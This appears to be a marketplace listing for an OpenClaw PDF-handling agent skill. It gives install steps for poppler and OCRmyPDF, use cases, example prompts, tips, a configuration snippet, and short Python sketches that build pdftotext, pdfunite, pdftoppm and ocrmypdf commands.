Official | Verified | file management | Safety 3/5

pdf

Work with PDF files - extract text for analysis, get metadata, merge/split documents, convert formats, search content, and OCR scanned documents. Use when you need to read, analyze, or manipulate PDF files.

Why use this skill?

Master your document workflow with the OpenClaw PDF skill. Effortlessly extract text, merge files, convert formats, and run OCR directly through your AI agent.

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/pdf-1wso5

What This Skill Does

The PDF skill for OpenClaw gives the AI agent a set of tools for reading, extracting data from, and manipulating PDF documents. It relies on command-line utilities such as poppler-utils, together with system commands, to turn PDF files into machine-readable text or images. Whether you need to recover text from a scanned legal document, merge multiple files into a single report, or retrieve metadata such as the author and page count, the skill exposes the command-line hooks the agent needs to perform these tasks within its environment.
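As a rough illustration of the metadata retrieval described above, the sketch below parses the output of poppler's pdfinfo command into a dictionary. Whether the skill invokes pdfinfo in exactly this way is an assumption; parse_pdfinfo and pdf_metadata are hypothetical helper names, not part of the skill.

```python
import subprocess


def parse_pdfinfo(output: str) -> dict:
    """Turn pdfinfo's "Key:   value" lines into a dictionary of strings."""
    info = {}
    for line in output.splitlines():
        # Split on the first colon only, so values such as timestamps stay intact.
        key, sep, value = line.partition(":")
        if sep:
            info[key.strip()] = value.strip()
    return info


def pdf_metadata(path: str) -> dict:
    """Run pdfinfo (assumed to be on PATH) and parse its output."""
    result = subprocess.run(
        ["pdfinfo", path], capture_output=True, text=True, check=True
    )
    return parse_pdfinfo(result.stdout)
```

Keeping the parser separate from the subprocess call makes it possible to check the parsing logic against captured output without having poppler installed.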

Installation

To use this skill, first make sure the OpenClaw environment is initialized, then install the skill package: clawhub install openclaw/skills/skills/hightower6eu/pdf-1wso5. The skill also depends on system packages that must be installed separately:

  • Linux (Debian/Ubuntu): sudo apt-get install -y poppler-utils
  • macOS: brew install poppler
  • Windows: choco install poppler

Advanced features such as OCR additionally require OCRmyPDF, installed with pip install ocrmypdf; OCRmyPDF in turn relies on Tesseract and Ghostscript being available on the system. Note that the mandatory openclaw-core utility must be configured according to the guidelines for your OS before any commands will execute.
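Before running the skill, it can help to confirm that the external tools are actually on the PATH. The following is a minimal sketch, assuming the skill uses the standard poppler executables (pdftotext, pdfinfo, pdfunite, pdftoppm) plus ocrmypdf; the tool list and the missing_tools helper are illustrative assumptions, not something the listing specifies.

```python
import shutil

# Assumed tool names: the usual poppler-utils executables and OCRmyPDF.
REQUIRED_TOOLS = ["pdftotext", "pdfinfo", "pdfunite", "pdftoppm", "ocrmypdf"]


def missing_tools(tools=REQUIRED_TOOLS, which=shutil.which):
    """Return the tools from `tools` that cannot be found on PATH."""
    return [name for name in tools if which(name) is None]


if __name__ == "__main__":
    missing = missing_tools()
    if missing:
        print("Missing tools:", ", ".join(missing))
    else:
        print("All required tools were found.")
```

The `which` parameter exists only so the lookup can be replaced in tests; in normal use the default shutil.which is sufficient.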

Use Cases

  • Automating data extraction from invoices or reports for database ingestion.
  • Converting bulk documents into image sets for visual inspection workflows.
  • Preparing documents for archiving by merging multiple PDF files into one.
  • Auditing document metadata to verify creation dates or authorship.
  • Converting image-based scanned documents into searchable text formats using OCR.
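The OCR use case above could be sketched with OCRmyPDF's command-line interface, which takes an input file and an output file. The helper name ocr_command, the ".searchable.pdf" naming scheme, and the choice of the --skip-text option (which leaves pages that already contain text untouched) are assumptions made for illustration; the skill may invoke OCR differently.

```python
from pathlib import Path


def ocr_command(src: Path, out_dir: Path, language: str = "eng") -> list:
    """Build an ocrmypdf command that writes a searchable copy of `src`."""
    # Hypothetical naming scheme: contract.pdf -> contract.searchable.pdf
    dst = out_dir / f"{src.stem}.searchable.pdf"
    return ["ocrmypdf", "--skip-text", "-l", language, str(src), str(dst)]


if __name__ == "__main__":
    import subprocess

    # Example: OCR every PDF in ./scans into ./searchable (both paths are assumed).
    out_dir = Path("searchable")
    out_dir.mkdir(exist_ok=True)
    for pdf in sorted(Path("scans").glob("*.pdf")):
        subprocess.run(ocr_command(pdf, out_dir), check=True)
```

Passing the command as a list rather than a shell string avoids quoting problems with spaces in filenames.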

Example Prompts

  • "Please extract the full text from the 'quarterly_report.pdf' file and save it as a text file named 'extracted_data.txt'."
  • "I need to combine all the invoice PDF files in this folder into one single document called 'combined_invoices.pdf'."
  • "Can you generate a 300 DPI PNG image of the first page of 'manual.pdf' so I can use it as a cover thumbnail?"
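For orientation, the three prompts above map naturally onto poppler commands. The sketch below builds the corresponding argument lists; that the agent resolves the prompts to exactly these commands is an assumption, and the function names are hypothetical.

```python
def extract_text_cmd(pdf: str, txt: str) -> list:
    """pdftotext writes the text of `pdf` into the file `txt`."""
    return ["pdftotext", pdf, txt]


def merge_cmd(sources: list, dest: str) -> list:
    """pdfunite takes the input PDFs first and the destination last."""
    # Skip the destination in case an earlier run left it in the same folder.
    inputs = sorted(s for s in sources if s != dest)
    if not inputs:
        raise ValueError("no input PDFs to merge")
    return ["pdfunite", *inputs, dest]


def first_page_png_cmd(pdf: str, out_root: str, dpi: int = 300) -> list:
    """Render only page 1 as PNG; -singlefile makes the output <out_root>.png."""
    return ["pdftoppm", "-png", "-r", str(dpi),
            "-f", "1", "-l", "1", "-singlefile", pdf, out_root]


if __name__ == "__main__":
    import subprocess

    subprocess.run(
        extract_text_cmd("quarterly_report.pdf", "extracted_data.txt"), check=True
    )
```

Sorting the inputs gives a predictable page order in the merged file, which matters when filenames encode dates or invoice numbers.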

Tips & Limitations

Check whether a document is password-protected before processing it; these commands can fail unless the password is supplied. For scanned documents, standard text extraction typically returns little or no text, so use the OCR functionality to generate a text layer first. Heavy processing such as high-DPI image conversion is CPU-intensive; render individual pages or small page ranges rather than entire documents of several hundred pages. Finally, quote all file paths so that spaces or special characters in filenames do not break commands.
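The tips above can be sketched in a few helpers: a heuristic for deciding that a document needs OCR, page-by-page rendering with an optional user password (pdftoppm accepts -upw), and shell-safe quoting for display. The 20-character threshold, the output naming, and all function names are assumptions chosen for illustration.

```python
import shlex


def needs_ocr(extracted_text: str, min_chars: int = 20) -> bool:
    """Heuristic: almost no extracted text suggests a scanned document."""
    return len(extracted_text.strip()) < min_chars


def per_page_png_cmds(pdf, out_root, first, last, dpi=300, user_password=None):
    """Build one pdftoppm command per page instead of one large job."""
    cmds = []
    for page in range(first, last + 1):
        cmd = ["pdftoppm", "-png", "-r", str(dpi),
               "-f", str(page), "-l", str(page), "-singlefile"]
        if user_password is not None:
            cmd += ["-upw", user_password]
        # With -singlefile the output is exactly <out_root>-<page>.png
        cmd += [pdf, f"{out_root}-{page:04d}"]
        cmds.append(cmd)
    return cmds


def as_shell(cmd) -> str:
    """Quote a command list for logging or pasting into a POSIX shell."""
    return shlex.join(cmd)
```

When commands are passed to subprocess.run as lists, no manual quoting is needed; as_shell is only useful for showing the command to a person.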

Metadata

Stars: 2387
Views: 1
Updated: 2026-03-09

Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-pdf-1wso5": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags (AI)

#pdf-processing #document-management #ocr #automation
Safety Score: 3/5

Flags: file-write, file-read, code-execution